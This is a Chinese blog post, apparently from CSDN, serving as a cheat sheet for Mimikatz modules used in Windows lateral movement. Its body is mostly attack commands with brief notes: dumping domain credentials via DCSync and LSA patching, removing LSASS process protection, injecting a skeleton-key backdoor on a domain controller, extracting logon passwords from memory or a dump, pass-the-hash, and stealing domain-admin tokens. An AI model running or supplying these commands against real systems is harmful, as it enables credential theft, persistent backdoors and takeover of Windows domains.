Mimikatz各模块基本用法

已于 2022-09-06 22:38:13 修改
阅读量1.5k 收藏
点赞数
分类专栏: 内网横移 文章标签: windows 安全
于 2022-09-04 21:32:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Canterlot/article/details/126694935
版权

privilege::debug

****获得系统权限,优先运行该命令

Lsadump 与LSA交互

lsadump::dcsync /user:用户名或sid,向DC要一个号的密码 ,/all就是要全部的
/domain域名,不填默认为当前域
lsadump::LSA 导出全部凭证,需管理员身份
/inject - 注入 LSASS 进程提取凭证数据,/patch - 补丁 LSASS 进程
/id - 目标用户账户的 RID, /name - 目标用户账户的帐户名称
//RID为502的帐户是KRBTGT帐户,RID为500的帐户是默认的域管理员账户。

Bypass lsass protection

lsadump::lsa /patch 报错 ERROR kuhl_m_misc_skeleton; OpenProcess (0x00000005)

mimikatz在配置有miidrv.sys时可以绕过:

privilege::debug
!+
!processprotect /process:lsass.exe /remove
misc::skeleton

misc 杂项

misc::cmd 开一个命令行
misc::taskmgr 开一个任务管理器
misc::regedit 开一个注册表编辑器
//这三个命令在管理员禁止使用这三个东西的时候可以硬开出来

misc::addsid 将用户账户添加到SIDHistory中,第一个参数为目标账户,第二个值为SID(或账户/组名称)

misc::skeleton 在DC上运行,将skeleton密钥注入到LSASS进程中,维持权限常用手段
使得所有用户可以用skeleton key代替原有密码进行身份验证,相当于所有用户多了个额外密码
默认注入密码为mimikatz ,DC重启后失效

net 信息收集命令

net::user, net::wsession, net::group

process 进程相关

process::list 列出进程
process::resume /pid:  恢复一个进程,start  启动~,stop  结束~,suspend  挂起~

sekurlsa 与内存交互

sekurlsa::backupkeys 获得备份主密钥(不设置为一串0)
sekurlsa::credman 列出凭证管理器
sekurlsa::dpapi 列出已缓存的主密钥(实际运行和上个命令的结果一致)
sekurlsa::dpapisystem 输出DPAPI_SYSTEM密文(密钥?)原文为secret
# 通过Dpapi获取Windows身份凭证:[<https://xz.aliyun.com/t/6508>](<https://xz.aliyun.com/t/6508>)
sekurlsa::ekeys 列出kerberos加密密钥
# 上面的貌似没啥用
sekurlsa::kerberos 列出所有登录用户的kerberos凭证(包括服务和电脑账户)
sekurlsa::krbtgt 获取krbtgt的全部凭证(DC上运行)
sekurlsa::logonpasswords 列出所有可用的凭证(和明文密码)
sekurlsa::minidump + path 上下文切换到lsass转储文件
sekurlsa::process 上下文切换回lsass进程
sekurlsa::msv 列出LM和NTLM凭证
sekurlsa::pth /user /domain:目标ip /rc4 or /ntlm /run(默认为cmd)  哈希传递
sekurlsa::tickets 列出最近所有经过身份验证的用户的可用的 Kerberos 票证,包括使用用户帐户的上下文运行的服务和本地计算机在 AD 中的计算机帐户。

logonpasswords 报错 ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
转储lsass.dmp到路径,# sekurlsa::minidump 路径/lsass.dmp , # sekurlsa::logonPasswords

token 交互、抓取、假冒Windows令牌

token::list 列出所有令牌
token::whoami 显示当前身份

token::elevate 提升至system权限
/id:指定目标token的TokenID
/domainadmin:窃取域管的token(之后可执行lsadump::dcsync等)
/enterpriseadmin:窃取企业管理员的token
/admin:窃取本地管理员的token
/localservice:窃取Local Service权限的token
/networkservice:窃取Network Service权限的token
/system:窃取SYSTEM权限的token

Kerberos 域相关

Golden Tickets
Silver Tickets
Trust Tickets
kerberos::ptt

原文:https://blog.z3ratu1.cn/Mimikatz使用简略.htmlmimikatz简单使用手册 | Z3ratu1's bloghttps://blog.z3ratu1.cn/Mimikatz使用简略.html

官网:Mimikatz – Active Directory Security

手册:https://wooyun.js.org/drops/Mimikatz 非官方指南和命令参考_Part3.html 

Canterlot
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mimikatz.zip附简单使用方法
08-01
mimikatz的使用需要administrator用户执行,administrators中的其他用户都不行。 注意该程序会被ban 提升权限 privilege::debug 抓取密码 sekurlsa::logonpasswords reg add HKLM\SYSTEM\CurrentControlSet\Control...
读文读报1——上线提权抓取明文密码
soldi_er的博客
04-13 2230
文章目录总结读文读报扩展阅读参考 总结 读文读报   “Shodan插件探测到81-83端口”   疑问:使用81-83端口的常见服务有哪些?   据说:81端口通常是路由器管理页面端口,或汉邦登录界面端口。 Fofa搜索 搜索命令 访问URL 判断 port=“81” 中国 xx:81/doc/page/login.asp 页面信息Hikvision,海康威视摄像头,admin/12345 region=“Zhejiang” && port=“81” xx:81 jhu
kali下通过msf中kiwi(mimikatz)模块的使用
失心少年
09-11 1018
kiwi模块mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。
mimikatz使用方法
课嗨教育的专栏
04-23 3735
0x00 简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe进程中获取当前登录系统用户名的密码, lsass 是微软 Windows 系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass 内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对 lsass 逆算获取.
Mimikatz使用方法
热门推荐
她叫常玉莹
08-21 1万+
Mimikatz命令抓取明文密码模块sekurlsa模块kerberos模块lsadump模块WDigestLSA保护获取高版本Windows系统的密码凭证msf中kiwi模块kiwi模块使用kiwi模块命令creds_allkiwi_cmd Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 Mimikatz命令 cls:清屏 standa..
mimikatz_trunk-1_mimikatz_
10-03
password decrypt windows
mimikatz-master源码
07-22
mimikatz-master
mimikatz获取系统密码
03-28
获取系统级别密码
mimikatz.rar
07-08
mimikatz 是一款windows平台下的神器,它具备很多功能,我认为最牛逼的是lsass.exe进程中获取windows的账号明文密码,当然他的其他功能也很强大。
揭秘ArrayList:深入探索Java的动态数组艺术
m0_51176516的博客
05-18 974
ArrayList作为Java集合框架中的核心类之一,它以其动态扩展、基于索引的快速访问和易用的API赢得了开发者的青睐。然而,在使用ArrayList时,我们也需要注意其潜在的性能开销、线程安全性以及内存占用等问题。虽然ArrayList在大多数情况下能够满足需求,但在处理大量数据、频繁插入删除操作或者多线程环境下,我们需要谨慎评估其是否是最优选择。总之,ArrayList是一个功能强大的工具,但在使用时需根据具体场景进行权衡和选择。
PHP开发的医院安全(不良)事件系统源码 医院不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
爱笑的源码博客
05-14 976
医疗安全不容忽视! 医疗不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
NewsMash的博客
05-15 136
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 366
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
如何确保您的Token安全:防范常见威胁与最佳实践
fudaihb的博客
05-14 968
Token安全是网络安全领域的一个重要方面,尤其是在现代应用程序中,token常常用于身份验证和会话管理。本文将探讨如何保护token不受常见威胁的侵害,并提供一些最佳实践来增强token的安全性。
智慧园区EasyCVR视频智能管理方案:构建高效安全园区新视界
TSINGSEE青犀视频官方技术博客
05-15 471
睡岗离岗检测:检测消控室值班员值岗情况,当发生脱岗、睡岗等问题时,即时报警,避免发生事件无人响应情形。
Web应用防火墙的重要性
最新发布
XRY_XIAO的博客
05-20 403
Web应用防火墙的重要性
家用充电桩远程监控安全管理系统解决方案
蓝蜂物联网
05-15 277
本方案旨在通过先进的物联网技术、云计算、大数据分析以及人工智能等科技手段,构建一个集实时监测、异常预警、故障诊断、数据统计、远程控制于一体的智能化平台,确保充电桩的安全运行及用户充电过程的便捷性与安全性。综上所述,家用充电桩远程监控安全管理系统解决方案深度融合物联网、云计算、大数据分析和人工智能等前沿技术,实现了充电桩的精细化、智能化管理,不仅提升了用户充电体验,降低了运维成本,也为能源管理的智能化转型注入了强大动力,具有显著的社会效益和经济效益。家用充电桩远程监控安全管理系统解决方案。
DDoS攻击揭秘与网站防护策略
网络安全服务提供商
05-14 760
DDoS攻击(分布式拒绝服务攻击)是一种利用大量被控制的计算机或智能设备(如僵尸网络)对目标网站或服务器发起大量无效请求或数据流量,从而导致目标系统资源耗尽、服务崩溃或无法处理正常请求的攻击方式。这种攻击通常是由一个或多个攻击者发起,他们通过控制大量被感染的计算机或设备,向目标系统发送大量看似正常的请求或数据,但实际上是为了消耗目标系统的资源,使其无法为正常用户提供服务。同时,还需要注意定期更新和修补系统漏洞、限制对敏感数据的访问以及加强员工安全意识培训等方面的工作。
kali mimikatz如何使用
04-11
Kali Linux的Mimikatz是一个渗透测试工具,可用于提取Windows操作系统上的凭据。您可以将其下载并在Kali Linux命令行界面中使用。它具有各种功能,例如在本地和远程计算机上提取凭据的能力,以及执行LSA Secret、NTLM hashes等等。您可以在互联网上轻松找到有关Mimikatz的更多信息和使用方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值